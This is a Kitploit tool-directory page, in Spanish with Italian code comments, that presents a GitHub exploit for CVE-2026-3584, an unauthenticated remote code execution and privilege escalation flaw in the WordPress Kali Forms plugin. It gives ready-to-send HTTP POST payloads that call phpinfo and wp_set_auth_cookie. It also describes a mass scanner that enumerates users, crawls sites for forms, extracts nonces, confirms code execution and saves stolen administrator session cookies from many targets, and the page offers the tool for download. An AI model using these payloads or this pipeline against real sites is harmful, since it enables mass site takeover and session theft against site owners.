Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-3584 — CVE-2026-3584 | Kitploit
Herramientas/GitHubGitHub/yucaerin/cve-2026-3584
Escalada de PrivilegiosReconocimientoEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónDesarrollo de Payloads
GitHubyucaerin/cve-2026-3584

CVE-2026-3584

CVE-2026-3584

Ver Repositorio
312hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-3584 – WordPress Kali Forms <= 2.4.9 - Ejecución Remota de Código No Autenticado a través de form_process

🔥 Resumen de la Vulnerabilidad

El plugin de WordPress Kali Forms versiones <= 2.4.9 presenta una vulnerabilidad crítica de ejecución remota de código no autenticado (RCE). Esta falla permite a los atacantes no autenticados ejecutar código PHP arbitrario en el servidor y obtener privilegios de administrador completo a través del endpoint AJAX kaliforms_form_process expuesto públicamente sin controles de autorización.

La vulnerabilidad reside en la función form_process que acepta parámetros controlados por el usuario (incluidos thisPermalink y entryCounter) y ejecuta callbacks PHP arbitrarios, lo que conduce a:

  • Ejecución Remota de Código (RCE) a través de phpinfo(), system(), eval(), etc.
  • Escalada de Privilegios a través de wp_set_auth_cookie() para obtener sesiones administrativas

ðŸ"" Plugin Vulnerable

  • Nombre del Plugin: Kali Forms – WordPress Form Builder
  • Versión Vulnerable: <= 2.4.9
  • Tipo de Vulnerabilidad: Ejecución Remota de Código No Autenticado + Escalada de Privilegios
  • CVE ID: CVE-2026-3584
  • Puntuación CVSS: 10.0 (Crítico)
  • Impacto: Compromiso total del sitio, acceso administrativo, persistencia
  • Enlace: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms/kali-forms-249-unauthenticated-remote-code-execution-via-form-process

🐛 Cómo Funciona la Vulnerabilidad

Análisis Técnico del Bug

La vulnerabilidad se manifiesta en la función form_process del plugin Kali Forms que gestiona las peticiones AJAX. El código vulnerable está expuesto a través de:

// Endpoint AJAX accessibile senza autenticazione
add_action('wp_ajax_nopriv_kaliforms_form_process', array($this, 'form_process'));

Flujo del Exploit:

  1. Endpoint No Protegido: El endpoint /wp-admin/admin-ajax.php?action=kaliforms_form_process es accesible para usuarios no autenticados a través del hook wp_ajax_nopriv_.

  2. Parámetros Controlables por el Usuario:

    • data[thisPermalink] - puede contener nombre de función PHP arbitraria
    • data[entryCounter] - puede contener nombre de función PHP arbitraria
    • data[formId] - ID del formulario a procesar
  3. Ejecución de Callbacks Sin Filtrar: El código vulnerable ejecuta callbacks PHP sin validación:

    $callback = $_POST['data']['thisPermalink'];
    call_user_func($callback);  // Nessun controllo!
    
  4. Cadena de Explotación:

    Attacker → POST Request → kaliforms_form_process
         ↓
    thisPermalink=phpinfo → call_user_func('phpinfo')
         ↓
    PHP Code Execution → phpinfo() eseguito
         ↓
    entryCounter=wp_set_auth_cookie → Cookie amministratore generato
         ↓
    Full Admin Access
    

Ejemplo de Petición Vulnerable:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=kaliforms_form_process&
data[formId]=1&
data[nonce]=abc123&
data[thisPermalink]=phpinfo&
data[email][email protected]

Resultado: El servidor ejecuta phpinfo() y devuelve información completa sobre la configuración PHP.

Para Escalada de Privilegios:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=kaliforms_form_process&
data[formId]=1&
data[nonce]=abc123&
data[entryCounter]=wp_set_auth_cookie&
data[email][email protected]

Resultado: WordPress ejecuta wp_set_auth_cookie(user_id) donde user_id corresponde a menudo a formId, generando cookies de sesión de administrador válidas.


🛠Mass Scanner - Cómo Funciona

Arquitectura del Escáner

El mass_scanner.py implementa una pipeline automatizada en 4 fases para la explotación completa de la vulnerabilidad CVE-2026-3584:

┌────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│                    MASS SCANNER PIPELINE                        │
├──────────────────────────────────────────────────────────────────────────────────────────────────────────────¤
│                                                                 │
│  Fase 1: Ricognizione API REST                                 │
│  ├─ Enumera utenti: /wp-json/wp/v2/users                       │
│  └─ Enumera post: /wp-json/wp/v2/posts                         │
│      → Identifica user_id e post_id per escalation             │
│                                                                 │
│  Fase 2: Scoperta Moduli                                       │
│  ├─ Crawl sito (depth=2)                                       │
│  ├─ Cerca pattern: 'KaliFormsObject', 'kaliforms'              │
│  ├─ Estrae nonce da JavaScript                                 │
│  └─ Estrae formId da HTML                                      │
│      → Trova tutti i moduli Kali Forms vulnerabili             │
│                                                                 │
│  Fase 3: Test RCE                                              │
│  ├─ Invia: data[thisPermalink]=phpinfo                         │
│  ├─ Verifica: 'PHP Version' in response                        │
│  └─ Salva: result/target_phpinfo.html                          │
│      → Conferma esecuzione codice remoto                       │
│                                                                 │
│  Fase 4: Escalation Privilegi                                  │
│  ├─ Invia: data[entryCounter]=wp_set_auth_cookie              │
│  ├─ Estrae: wordpress_logged_in + wordpress_sec cookies        │
│  ├─ Verifica: Accesso a /wp-admin/ senza redirect             │
│  └─ Salva: result_cookie/target.txt                            │
│      → Ottiene accesso amministratore completo                 │
│                                                                 │
└───────────────────────────────────────────────────────────────── ┘

Detalles Técnicos de Implementación

1. Normalización Automática de URL

def normalize_url(self, target):
    # Aggiunge automaticamente http:// o https://
    # Prova prima HTTPS, poi fallback su HTTP
    # Gestisce porte personalizzate (es. :8080)

2. Enumeración de API REST

def enumerate_users_api(self, target):
    # GET /wp-json/wp/v2/users
    # Estrae tutti gli user_id disponibili
    # Usato per mappare formId → user_id
    
def enumerate_posts_api(self, target):
    # GET /wp-json/wp/v2/posts
    # Estrae tutti i post_id disponibili
    # Identifica sovrapposizioni user_id/post_id

3. Descubrimiento de Formularios (Crawling Inteligente)

def discover_pages(self, target, max_depth=2):
    # Crawl ricorsivo del sito
    # Cerca pattern JavaScript: 'KaliFormsObject'
    # Filtra URL non necessari (js, css, immagini)
    # Segue solo link interni
    # Ritorna lista pagine con Kali Forms
Descargar herramienta